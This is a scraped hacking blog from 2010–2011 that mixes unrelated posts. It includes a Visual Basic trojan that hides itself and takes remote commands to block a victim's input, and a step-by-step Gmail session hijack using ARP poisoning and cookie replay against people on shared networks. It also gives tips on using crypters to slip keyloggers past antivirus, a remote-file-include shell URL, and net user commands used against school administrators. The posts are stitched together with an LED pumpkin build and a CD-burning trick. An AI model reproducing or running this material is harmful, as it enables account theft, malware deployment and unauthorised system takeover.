The activities described are security tests. Ethical hackers can perform security tests from an unknown perspective, blackbox testing, or with all documentation and knowledge, whitebox testing. The type of approach to testing that is taken will depend on the time, funds, and objective of the security test. Organizations can have many aspects of their protective systems tested, such as physical security, phone systems, wireless access, insider access, or external hacking. To perform these tests, ethical hackers need a variety of skills. They must be adept in the technical aspects of network but also understand policy and procedure. No single ethical hacker will understand all operating systems, networking protocols, or application software, but that’s okay, as security tests are performed by teams of individuals where each brings a unique skill to the table.

So, even though “God-like” knowledge isn’t required, an ethical hacker does need to understand laws pertaining to hackers and hacking. He must also understand that the most important part of the pre-test activities is to obtain written authorization. No test should be performed without the written permission of the network or service. Following this simple rule will help you stay focused on the legitimate test objectives and help protect you from any activities or actions that might be seen as unethical.

Part 2 Will begin shortly

Complete HACKING information

noreply@blogger.com (Eracnid Mitnick) — Tue, 22 Feb 2011 10:44:00 +0000

Introduction:

We see a millions of people going to different forums and websites and asking "how do i hack an email?", "Can you hack blah for me?". So thought to create a tutorial which will give you the basic idea about what the heck is a "HACK", and how to DEFEND YOUR SELF AGAINST HACKERS.

Disclaimer:

As i have seen controversies in the past, here is the disclaimer.

I or the staff of hacking team does not take any responsibility if you use this tutorial in unethical way. This is written to help you to beware of whats going around, and save your self by not being hacked!

Background:

Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:

These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:

Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.
Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.

b. Brute Forcing

Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:
1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.

P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.

c. Keylogging

Keylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.
Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information.

Disadvantages :
1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :
1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.

d. Trojans:

Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:

I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:

Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website!

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:

yoursite.com/index.php?id=545
just add a ' like this at the end

yoursite.com/index.php?id=545'

2. XSS:

XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.

3. Shells:

Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.

4. RFI:

RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:

yoursite.com/shell.txt
and you found a vulnerable site to RFI... then you can do as follow:

victimssite.com/index.php?page=yousite.com/shell.txt
This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:

yoursite.com/index.php?id=545
just add something liek this at the end

yoursite.com/index.php?id=http://www.google.com
And if it incldes the google page into your page, that means its vulnerable to RFI.

70 LED matrix in a Jack-o-lantern

noreply@blogger.com (Eracnid Mitnick) — Wed, 27 Oct 2010 09:21:00 +0000

What takes eight hours to solder and uses more shrink tubing that you thought imaginable? An LED matrix installed in a real pumpkin. When I mentioned that we’d like the LED pumpkin in last Friday’s post scaled up to a full LED matrix I had no idea it would be me doing the work. But [Caleb] and I thought it might be just the thing to present for the hacker’s favorite holiday.

Installed in the autumn vegetable is a marquee made from a 5×14 matrix of light emitting diodes. I spaced them by printing out a grid on the computer, taping it to the pumpkin, and drilling 70 holes in the front of the thing. The real trouble came when inserting all of the LEDs from the inside; each of them has four wires soldered to it, creating a net of black wiring. Above you can see it turned out great. This is a shot of it scrolling the message HAPPY HALLOWEEN.

Join us after the break for video of this prop. But we’re not just sharing the finished product. I’ll take you through the build process. Along the way you’ll learn the design considerations that go into an LED matrix and how you can use these techniques to build your own in any size and configuration you desire.

If you want to see a larger version of the banner image try this, and below is the video clip promised. Sorry for the poor quality, I’m working on borrowing a better video recorder (I’ll post an update if I manage to get one). There are a couple of animations that happen too fast for the camera. One is a side-to-side sweep that looks similar to a Cylon Eye or the front of Kitt, the car from Knight Rider. The other effect that is poorly represented in the video is a chase function that outlines the rectangle of the display. These both look great to the eye, and fortunately the scrolling text comes out pretty well in the video.

I’m going to take you down the rabbit hole of LED Matrix design but before that let’s look at what it took to make this Jack-’o-lantern. If it turns out to be more than you can chew, we’ve got a beginners tutorial to help you get started with these microcontrollers.

Building the hardware

Before we talk about how to design the circuit, let’s take a look and the build process.

I decided from the start to use different colored LEDs. For reasons that I’ll discuss in-depth in the design section of this tutorial I needed to drive the LEDs at about 10 mA each. I calculated my resistors and then measured each to make sure I was close to my target. This is just fine for blue.

I wanted a way to hold the LEDs while I’m soldering, and I needed a template for drilling the pumpkin. Here I’m using that template made from my Eagle board layout to make an assembly jig using some hardboard. This turned out to be a rather poor choice of material because it started to come apart on the underside, but it worked.

I need to solder all of the cathodes in the same row together. I cut small pieces of wire (13 for each row) plus a longer wire to connect to the driver board. Above I’m soldering those wires into daisy chains.

Here’s a daisy chain for one row… four more to go.

I’m using clear LEDs which means you can’t tell what color they are when there’s no electricity running to them. Before moving a row to the assembly jig I tested them on the breadboard.

As I moved each LED from the breadboard to the jig I clipped off the excess cathode lead. From there remember the mantra: ‘Shrinktube FIRST!!!’ or you’ll be sorry. You can see it just above the solder joint in this image.

Just keep going down the row until complete. In the image above I’ve already heated the shrink tube with a candle-lighter. Note: The two images above are different rows. For one I started on the left and for the other I started on the right. I hope it’s not too confusing.

Here’s one row of completed soldering. After each I removed it and set it aside.

All of the rows have been completed and I’ve reinstalled them in the jig in preparation for soldering the anodes into columns.

Here’s the wires cut to make daisy chains for the columns. I used black wire for the short sections because I’ve got a huge supply of it compared to the red, which I’ve cut for the control lines.

The completed column daisy chains.

Here I’m soldering the fourth column. After I’ve finished one I just lifted up the five LEDs and held them aside with this third hand. Go slowly and be patient… you can do this!

Done! Well, the LEDs are all soldered. It’s time to make a control board for the rows.

Here’s the control board for my rows. I hot glued the incoming lines from the rows to the board for strain relief. Each is connected to the collector of a 2N3904 transistor. The camera flash makes it hard to see but there is a 3k3 resistor connected to the base of each transistor. I’ll add single-conductor wire to those later so they can be plugged into the breadboard. On the left you can see a wire for the GND rail, which connects to the ground of the power supply.

Each column contains the same color LED. I found that the red LEDs needed a different resistor from the rest. Here I’ve soldered resistors to the control wires for each column and soldered groups onto pin heads for each interface with the breadboard.

Here’s the finished control board. At the center of the breadboard is an ATmega168 microcontroller. The black arches connect the transistor base to PortC of the chip via the 3k3 resistors. There are three groups of column pin headers that plug into PortB and PortD.

This is an overview of the completed hardware. At this point I was sure hoping I’d be able to get this into the pumpkin.

Here I’m working on the firmware for the matrix. This is where a better choice of material for the assembly jig would have been nice. But like I said before, it worked.

Getting it in the pumpkin

I started with a fairly large donor pumpkin. I tried to pick one that had a fairly flat face without too much curve.

Before starting I made sure to locate where the matrix would be drilled by taping on another copy of the template I used for the assembly jig.

I cut a large access hatch in the back and cleaned out the guts. The seams of this will not be seen from the front.

Here it is, nice and clean. I want to keep as much wet gunk away from the electronics as possible.

Time to drill. I used a bamboo shish-kebab skewer to poke a pilot hole through the skin of the pumpkin so the drill-bit wouldn’t wander. I found a 13/64th drill bit worked perfectly.

Here’s the completed grid.

Here’s where the LEDs need to go. I spent a bit of time making sure the holes were cleaned out using the skewers.

Take a deep breath and start inserting LEDs. Once I had them all in place I powered up the unit and checked to make sure I hadn’t switched around any of them. Once I knew it was right I used a skewer to push each LED through to the surface.

This little plastic dish keeps the control circuitry dry on the bottom. I’ve added a little 5v regulator I built for a different project, with a 9V batter hidden beneath the larger board.

The power is on and I’ve sealed the hatch using a few skewers.

This is how it looks with the lights on. Here it’s displaying the work BOO.

The finished product. Whew, what a relief!

How to design an LED matrix

Ok, let’s jump into the why’s and how’s of building an LED matrix.

Multiplexing

The display I built has 70 LEDs. If you individually address each LED you’re going to need 70 pins on your microcontroller. But there’s an easier way. Multiplexing is a method of lighting just a portion of the display at one time. Using a microprocessor you can switch which section is on so quickly that your eye doesn’t ever perceive it being off.

Because one section will be turned off while scanning through the other parts of the display you want to keep the number of multiplexed sections low. I chose to multiplex the five rows of this matrix. That means that one row will be on 1/5th of the time, which we call a 1/5th duty cycle. This is basically a type of pulse-width modulation, a technique we use to dim LEDs. I’ve used ultra-bright LEDs for this very reason.

Here’s how the multiplex of this display is going to work: Turn off all rows and columns. Set the columns you want to be illuminated in the first row. Turn on the first row driver and the columns in that row will light up. Start over and move to the second row. Here’s the schematic for the matrix I built (click to enlarge):

Columns and Addressing

We want each LED to have the same brightness. Because only one row will ever be on at one time. A single resistor in each column will work for all of the LEDs in that column. That is because an LED must be connected to both voltage and ground in order for current to flow. All of the Anodes (positive leg of the LED) are connected together in the columns, and all of the cathodes (negative leg of the LED) are connected in rows. So turning column 1 on and row 1 will let current flow through the LED at that location. The LEDs in rows 0, 2, 3, and 4 will not light because their rows haven’t been turned on and so they have no connection to ground on their cathode. In this way we build a grid of LEDs that are addressable.

Size Limitations

Multiplexing introduces an issue with current draw. I am limited in the number of columns I can drive because I’m connecting them to a microcontroller. If you look at the ATmega168 electrical characteristics in the datasheet you’ll find it can source 40mA per pin. But there is a limitation on what the supply pin of that chip (VCC) can source. The VCC pin is limited to 200mA. We must stay below that threshold or the chip may be damaged.

This is part of the reason that I chose to use 14 columns. There will never be more than 14 LEDs on at once because that’s how many are in a single row. If I drive them at 10mA each, I’m pulling a total of 140mA. This is below the 200mA threshold and leaves some room for error, and for the current that the ATmega168 needs to run. I’ve also limited it to 14 because I wanted to reserve 2 particular pins on the device for other purposes, but more on that later.

We need to consider the current on the low side of the LED matrix. The rows act as the ground connection for the display. If all the LEDs in a row are illuminated at once, there will be around 140mA coming down that control wire. It can’t be connected directly to a microcontroller because that’s too much current for one pin. Instead, I’ve used an NPN transistor. The 2N3904 conveniently has a 200mA limit which is enough to handle the 140 mA sinking from the display. These transistors work like a switch, requiring just 1/100th of the current you are switching to be present on the base leg of the device in order for it to connect the control wire to ground.

How can we make bigger displays?

I wanted to keep the parts count for this display small, but there’s really no limit on size if you’re willing to add more components. Beefier transistors allow you to switch much higher currents. And you can use cascading shift registers to expand the number of columns. Those shift registers are addressed with one data line and a clock… pulsing data in serially instead of in parallel as we’re doing in our example. You take a speed hit because it takes two cycles for each column (one to set the data bit, one to clock it in, and repeat until all columns have been pulsed in). Explaining this in detail is beyond the scope of this tutorial but as long as you are keeping current consumption for your parts within the device specifications you can go big.

Making the connection

As I said above, I wanted to keep my parts count to a minimum and so chose not to use shift registers. That means I need one pin for each column and one pin for each row. Using all eight pins on PortB and PortD of the microcontroller I could still hook up the five rows to PortC AND have at least one pin left over (two pins if you want to use RST as I/O). Why didn’t I make this 16 columns long?

There’s a good reason. I wanted to leave the serial port on the chip available for future use. RXD and TXD are located on pins 0 and 1 of PortD. I could have moved the last two columns to a different port but that would mean addressing 3 ports for the columns instead of two; causing a slowdown in the performance of the processor.

Writing the code

Writing code for a multiplex display comes in two parts; some type of frame buffer, and code to handle the multiplexing in the background. Please download the source package and follow along. There are pin, port, and data direction register defines at the top that will clarify what some of the code examples in this post are doing.

Frame buffering

This is a simple concept. You need a data structure that represents the physical display. We’re operating with pixels that are either on or off, which is the definition of binary code. So we just need to think of our currently displayed frame as five integers. An integer is a 16-bit number when working with AVR; one bit for each LED (two bits will go to waste) and five integers for the five rows:

volatile int buffer[5] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000 };

I’ve used hexadecimal instead of binary to instantiate this array. That’s a pretty common practice because it takes 1/4 of the characters to represent the same amount of data. Be assured, 0×0000 and 0b0000000000000000 equal the same value.

Also notice that I’ve used the keyword ‘volatile’. This is extremely important, because this data will be accessed by both an interrupt service routine, and the main body of the code. If it is not volatile the compiler may optimize out changes to this code, resulting in bizarre and hard to debug behavior. Also, we’re using 16-bit data types on an 8-bit device. It will be important to disable interrupts when changing the data so that we don’t have an interrupt happen between changing the first and second bytes of an integer. More on this later.

Interrupt drive multiplexing

This is really one of the easiest parts of this process. It can just be a little hard to wrap your mind around what’s happening at first.

We don’t want to ever think about what’s happening with the scanning of our five rows. Using a timer-based interrupt we can multiplex the display at a constant rate and forget about it.

Here’s how it works. We set up a timer to trigger an interrupt many times per second. When that interrupt occurs, the processor will stop running the main loop of our code (no matter what’s going on) and run the code in our Interrupt Service Routine (ISR). Here’s how I setup Timer1 to interrupt 500 times per second:

//Initialize the Timers
static inline void initTimers(void) //Function used once to set up the timer
{
TCCR1B |= 1<
TIMSK1 |= 1<
OCR1A = 0x07D0;   //Set compare value for 500 times per second
sei();    //Enable global interrupts
}

Let’s consider the math for just a bit. The ATmega168 has an internal clock that is set to run at 1 MHz. I’d like to have my display updated 500 times per second, resulting in a complete refresh 100 times per second. So 1,000,000 cycles per second divided by 500 interrupts equals a target of 2000 cycles. I need to set up a timer that will count each of the system clock cycles and trigger an interrupt when 2000 of them have passed. That is what I’m doing with the OCR1A value, 0x07D0 is the hexadecimal equivalent of 2000.

For those of you who really know what you’re doing you’ve probably notice an error. The Timer starts counting at 0 instead of 1, which means I really should be interrupting at one cycle less that 0x07D0 but it’s close enough for jazz.

Interrupt handling

Now that we’ve written code to create an interrupt 500 times per second we’ve got to do something when that happens. The plan is to keep track of the next row that should be turned on. At the beginning of the interrupt we’ll turn off the entire display, set the column pins for the next row to be displayed using the frame buffer, turn on that row, and setup for the next interrupt. Here’s the code to make that happen:

ISR(TIMER1_COMPA_vect) //Interrupt Service Routine handles multiplexing
{
//Shutdown all rows
rowPort &= ~rowMask;

//Shutdown all columns
colPort0 &= ~colMask0;
colPort1 &= ~colMask1;

//Set buffer data to columns
colPort0 = (char)buffer[row_track];
colPort1 |= ((char)(buffer[row_track] >> 6) & 0xFC); //Shift data and mask out lower bits (reserver for Rx and Tx)

//Drive row
rowPort |= (1<<(4-row_track));

//Preload row for next interrupt
if(++row_track == 5) row_track = 0;  //Row tracking
}

There is a bit of magic code going on above. Here it is out of context so we can pick it apart:

colPort1 |= ((char)(buffer[row_track] >> 6) & 0xFC)

I’ve defined ‘colPort1′ earlier in the source code as PORTD. That’s the one where we’ve reserved the lowest two bits for later use as a serial connection. When we write the integer data to a port only the lowest 8-bits will be read by the microcontroller because that’s the size of the ports. To the right of the equals sign I’m casting the integer data as an 8-bit char. We want the most significant byte of that integer data for columns 8-13, so we’re shifting the data to the right. But I only shifted it six spaces, because we’re not going to use the lower two bits of the register. Finally, I used the bitwise ‘&’ operator to mask out the lower two bits so that we don’t mess up any other uses for those pins that may come in the future. I feel this line of code is a great example of the power of binary data and if you don’t fully understand it you simply must take the time to study how this works. It’s a fantastic part of working with embedded systems.

Manipulating the frame buffer

Our display is multiplexing in the background and we no longer have to worry about that. Now you can display just about anything you want by manipulating the frame buffer.

In this case, the frame buffer is an array of five integer values. As I discussed earlier, when working with an 8-bit device it takes at least 2 cycles for it to write a 16-bit integer. What happens if an interrupt fires between those two cycles? For this reason it’s important to disable interrupts while changing the frame buffer. But disabling interrupts will stop our automated multiplexing so make sure you change the frame buffer quickly and enable interrupts as soon as you can.

void clearScreen(void)
{
cli();
for (unsigned char i=0; i<5; i++) buffer[i] = 0x0000;
sei();
}

The above code is probably the simplest example we can use. This will immediately clear the display. The ‘cli();’ command will disable interrupts, and the ‘sei()’ command will enable them. In between I’ve used a ‘for’ loop to set all five integers in our buffer array to 0×0000, which represents off. If I had set them to 0×1111, all of the LEDs in the display would be illuminated.

Simple trojan in vb ..... (only for learning)

noreply@blogger.com (Eracnid Mitnick) — Wed, 27 Oct 2010 08:53:00 +0000

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using

Code: VB

Private Sub Form_Load()
     Me.Visible = False
End Sub

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Code: VB

Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub

Code: VB

Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Code: VB

Module

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long                      

Public Function DoActions(x As String)
     Dim Action
     Select Case x
               Case "block"
               Action = BlockInput(True)
     End Select
End Function

Code: VB

Private Sub cmdConnect_Click()
     IpAddy = txtIp.Text
     Win.Close
     Win.RemotePort = 2999
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub
           
Private Sub cmdBlockInput_Click()
     Win.SendData "block"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.

noreply@blogger.com (Eracnid Mitnick) — Thu, 30 Sep 2010 18:24:00 +0000

Introduction

If some viruses are attacked especially a variant of autorun. U'll see an "Open with..." dialog when u try to open a drive.

Here are the steps to delete it from ur hard drive.

Goto command prompt and goto the drive where u'll get the "Open with..." dialog.
To do this

Code:

step 1 : start -> run
step 2 : type cmd
step 3 : enter the drive name followed by a colon

type attrib

It'll list out the attributes of all the files in the drive(only files, not folders and files inside that folders)

U'll see some of the files with attributes s h r

Type this code

attrib -s -h -r *.*

The above line resets the attributes of all the files in the drive. Then delete the files which has s h r attributes set.(see picture) to delete the virus file

del . e.g del w.cmd del autorun.inf

After removing the virus file from each drive Logoff ur PC and Logon again. This is a must. In somecases It may be optional. To be safe perform it.

NOTE: The files shown here are just an example. Original virus file may be of different name. The virus will affect any drive. I've just taken D: drive for illustration. THIS CODE SHOULD NOT BE USED IN "C:" DRIVE IF WINDOWS IS INSTALLED IN IT, AS THIS DRIVE CONTAINS SYSTEM FILES.

Write more on your CD !!!

noreply@blogger.com (Eracnid Mitnick) — Thu, 30 Sep 2010 18:22:00 +0000

Sometimes you must have noticed that you have 1gb of data to write. But you are unable to decide that what media should you use. Because 1 DVD can be more than enough required and 1 CD is not enough for writing the data. And if you use another CD, that would be probably half free. So, you will be confused that what to choose.

We all, have heard about NERO's feature OverBurn, under which NERO can write upto 10 MB extra data on your CD/DVD than its capacity. But have your ever heard that you can write upto 300 MB extra data on your 700 MB capacity CD?

Yes, It is possible. If you are using the Linux. Linux has such powerful features, which can make this happen. So, I hope till now, you will be knowing that what I am going to discuss in this article.

Before I start mentioning the steps, I would like to tell you that USE THIS TRICK COMPLETELY AT YOUR OWN RISK. Neither Go4Expert.com not I will be responsible for any kind of damage done to your system or Media.

Because I believe that Linux is very delicate system. Only the experts should handle it.

So lets start with the steps:
1. You need to download the following tools:

zisofs-tools (latest) Download link: http://www.kernel.org/pub/linux/utils/fs/zisofs
CDRTools (< 2.01) Download link: ftp://ftp.berlios.de/pub/cdrecord/
or
CDRKit (Latest) Download link: http://www.cdrkit.org/releases/
GCC 3.5 or GCC 4 (recommended)

2 a. Compiling CDRTools:

unpack the .tar.gz
Code:
tar -xvzf cdrtools-beta.tar.gz
configure:
Code:
./configure -prefix=$HOME/cdrtools
(Replace prefix with anything you like)

compile and installs:
Code:
make && make install

2 b. Compiling CDRKit

unpack the .tar.gz
Code:
tar -xvzf cdrkit-current.tar.gz
configure:
Code:
cmake -DCMAKE_INSTALL_PREFIX=your/prefix.
compile and install
Code:
make && make install

3. Compiling zisofs-tools

Follow the same steps for zisofs-tools as did for CDRTOOLS, but do not specify a prefix.
MAN Pages for review:
    -mkzftree : www.man.cx/mkzftree
    -mkisofs : www.man.cx/mkisofs
    -genisoimage : www.man.cx/genisoimage

4. Creating CD/DVD

create a directory tree of cd in sperate directory
create another directory to hold compressed filesystem

mkdir $HOME/compcd
create compressed structure

mkzftree $HOME/cddir $HOME/compcd
Compressed disk structure is created and now lets compile the ISO image.

Switch to prefix/bin of CDRTools or CDRKit (whichever you are using)
use mkisofs or genisoimage respectively

genisoimage -R -z -o cd.iso $HOME/compcd
Burn the ISO image
Insert disk and mount
Change to mount directory and type ls-la for file listing
type df -ha

That's it.

Drawback of this technique is that, this kind of compilation would be readable by linux only and linux which is having latest kernel module.

Hacking Gmail account using GX cookie

noreply@blogger.com (Eracnid Mitnick) — Thu, 30 Sep 2010 18:19:00 +0000

Disclaimer: This post is only for education purpose.

Introduction

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:

* You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
* You know basic networking.

Tool used for this attack:

    * Cain & Abel
    * Network Miner
    * Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,

If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).

    * Start Cain from Start > Program > Cain > Cain
    * Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
    * Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.

How to check your physical IP ?

> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

    * Click on Configure > APR > Use Spoof ed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

    * Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.

    * Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

    * Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
    * From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.

Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

    * Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
    * Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon

Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.

    * Open Firefox and log in your gmail email account.
    * from firefox click on Tools > cookie Editor.
    * In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
    * From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
    * Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https

Simple cmd.exe tricks for starters

noreply@blogger.com (Eracnid Mitnick) — Thu, 30 Sep 2010 18:17:00 +0000

Introduction

Hey guys, yeah this is my first posting here. These are just some simple little things i like to use to cause no end of frustration to my school administrators....yea im mainly a white hat tho

Background

Basically these are just some simple cmd.exe commands that normal people don't know about. Actually most people don't even know what cmd.exe and as soon as you open it their like 'oh shit you must be a hacker'. God damn sterotypes

The code

Ok the first code is to see all the users on the computer
the second will change the password of any user (including the admin) note: unless using a network command line interface eg. Powershell it will only change the individual computers admins password which is still pretty useful
the next adds a new using to the comp
you guessed it, this one deletes a user
and this one adds a user to a localgroup

Blocks of code should be set as style "Formatted" like this.

net user
net user (username) * [note: just start typing the new password you wont, no writting will come up though just hit enter when ur done]
net user (username) /add
net user (username) /del
net localgroup (localgroup eg.administrators) (username) /add

Hacking a Network Computer

noreply@blogger.com (Eracnid Mitnick) — Thu, 30 Sep 2010 18:16:00 +0000

I wrote this because it really worked for me a few times and I hope it does for you too, all you need is very a gullible target.

